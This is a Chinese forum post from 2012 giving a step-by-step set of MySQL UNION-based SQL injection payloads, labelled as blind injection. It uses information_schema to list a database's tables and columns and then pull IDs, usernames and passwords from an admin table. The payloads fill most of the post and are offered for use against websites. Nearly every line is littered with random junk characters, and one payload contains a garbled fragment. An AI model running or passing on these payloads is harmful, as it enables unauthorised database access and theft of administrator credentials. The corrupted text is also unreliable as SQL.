本文介绍MYSQL盲注的一些语句和方法
* P) f9 j o' m0 M: E2 i: Y2 [2 M' G. z$ o5 V
学习盲注前先了解下 IFORMATION_SCHEMA 库$ [$ i+ `& ]2 r3 K+ S& q
2 Q1 z+ f) E- ]( z3 s
Mysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库,其中记录了Mysql中所有# o' T. E- j5 n8 c T' r
存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说明。5 v$ }% O( a9 f8 @( w
1.得到所有数据库名:
$ U( ]; Z* \9 P6 W: U|SCHEMATA ->存储数据库名的表: V" Y0 O4 J/ S6 o& H: }0 n, s
|---字段:SCHEMA_NAME ->数据库名称1 |& e; R4 ^7 t1 V! G$ q1 |
* M2 _- v4 {. N' P' P
|TABLES ->存储表名
3 z5 n/ P( A' p* c|---字段:TABLE_SCHEMA ->表示该表名属于哪个数据库名) F" s+ n3 }% h( L
|---字段:TABLE_NAME ->存储表的表名1 X. I# ]7 w! \6 ~) D
3 J/ g1 n0 k: }& P1 b8 d2 x' t|COLUMNS ->存储的字段名表* E1 t+ G" s. J
|---字段:TABLE_SCHEMA ->该字段所属数据库名6 X! k6 v0 p: }6 x, [/ u
|---字段:TABLE_NAME ->存储所属表的名称; Y2 j! d* B; V8 N% h4 h
% F7 P3 r; H5 V: M) \& L( j B+ g
|---字段:COLUMN_NAME ->该字段的名称
$ X4 b% ^5 x0 r' W! O$ F6 j* Y* [" s/ C% B5 a' S h
$ I2 k0 l7 {* z- f9 }" r( I. I1 R5 O$ U. D% O4 N) D& J, o! V' |! c# u
###########################################################################
9 b/ S8 }$ W, u& d! l5 L* s/ b: J+ H+ N% L6 Q! e! m5 R* K( h
0x001 获取系统信息:
r' U& l% b5 k9 z2 d7 z
+ i2 t+ M1 u' e1 gunion select 1,2,3,4,5,concat(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*, n! I' L0 F$ R; d# p
0 P3 t+ _2 ?7 w3 f. b% u) B
/* q; ]9 K3 Q$ J$ o' \/ G) z
7 K5 h6 V$ J) D6 i
@@global.version_compile_os 获取系统版本
: k) }) p$ W, b+ B6 \# R4 @
/ S( L. M( y2 s" @( i+ n& i+ p7 F@@datadir 数据库路径$ Q: E# k" K4 Y4 Z8 s4 }
database() 当前数据库名称; c% \; R% ~: ^* Z
0x3c62723e 换行HEX值
/ {! f( q1 U2 p" w
7 R! o; P) l1 D) G T*/
( N: r2 W2 m/ ]" K2 S
' H, E" C+ u, c$ D5 E. c # @3 z4 Q) M; q( O, O# p
5 q1 T; e6 s% z######################################################################5 ?5 X6 M" F' b' v4 `
/ D' Q0 D" A/ }3 M0 ^ j
0x002 获取表名7 q: s. H8 v5 G% z
$ K$ l* W7 R* G( }$ ^
union select 1,2,group_concat(table_name),4,5,6,7,8,9 from information_schema.tables where table_schema=0x67617264656e /*
' G2 T8 c6 Z3 U) \) u' C T9 v9 D( ~
0 e( Q8 V' L# M' e3 G7 O& r5 F. n: E8 p
/*: Q2 a- Z0 L' n4 G( z: i
7 x" f1 n7 V0 N# O0x67617264656e 为当前数据库名
* d1 q1 x1 Q6 ]) L \4 |+ T! I Y) g5 \' s9 m9 g
group_concat(table_name) 使用group_concat函数 一步获得该库所有表名5 v4 n1 |! q1 O
% H l) T' v2 ]/ x$ w; _*/3 P9 t1 Y1 O& o( K# D! s+ [' Y
3 J8 G. u; G# i
######################################################################
8 V: q3 y$ F ]! q9 d0 M$ g$ d1 M+ _
/ C! d% u" Y* Y# i2 w
$ [( S5 s# b- D- H6 J
0x003 获取字段" A7 f6 H6 b* ]4 f9 u6 O4 x, j
$ P' w- J( I0 T- j9 p$ eunion select 1,2,group_concat(column_name),4,5,6,7,8,9 from information_schema.columns where table_name=0x61646d696e and table_schema=0x67617264656e limit 1 /*
% o$ _: X% d% t' j5 T3 ]( ~/ V% J) k' Q4 q4 u1 ^' P! H H
/*
l0 v$ V4 c+ q1 ^2 d+ f$ Q
* t2 w z' _9 Y, {. G7 Dgroup_concat(column_name) 同样是 一口气 获得该表(0x61646d696e)所有字段
( p4 H: w! E2 P6 Z, l; E; V- W o( }7 e$ g0 y' a, ?
0x61646d696e ->选择一个表* N3 ]/ h5 J; C1 I- N! J# a3 A) A
# C+ }. @. R* E y! N2 R; D
0x67617264656e ->数据库名
+ w T N9 G+ j( B$ w% k0 G) _
; e$ r' y+ i1 D) h3 P e9 O v*/2 N) E4 s# p. J! z' R, T3 T
* z' C3 h a) m/ ]- ~
#####################################################################
8 ?! R+ d- u) {. ^0 U: V" F$ W5 S1 |
. O+ w5 |" C, S; ~ t$ H. d T' {. f2 o* e' s( p( a, {
1 P6 W6 m% A- W7 Z; z0x004 获取数据
* o9 Q, W5 K+ s/ i3 E& ~; G8 z1 ~6 D/ o; n( p3 U1 \$ B
union select 1,2,3$ b" Z9 p9 K& }! q3 D1 Q
,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin0 C+ p! Y+ e" X. u3 T' I& B
+ `; r2 S/ m# {' |6 sunion select 1,group_concat(id),group_concat(adname),4,5,group_concat(adpassword),6,7,8 from admin2 O( U- n/ Z: a
; b$ q) @, ^/ q* Y2 ]( G3 |
& `# y5 d1 F0 [4 B( E3 s$ e2 h
& _+ `" v5 u, g8 c: y/*& q2 V/ }9 }2 e
6 l. J1 N7 x2 Q v0x3c62723e 换行符号HEX编码
3 ^- G# @& g4 p+ ~* ]/ }8 S z# D
1 T' @+ j0 N* ]0 f. b2 s3 Egroup_concat 同时获得该字段所有数据
( y% D3 [% `: k _7 N. d p
% m$ U' p3 ] O2 b: \2 i*/
$ ~; h- c7 L: n* m. o
2 B0 P( M4 Q) u) o7 R6 i4 V |
发表于 2012-9-13 17:48:44
收藏
支持
反对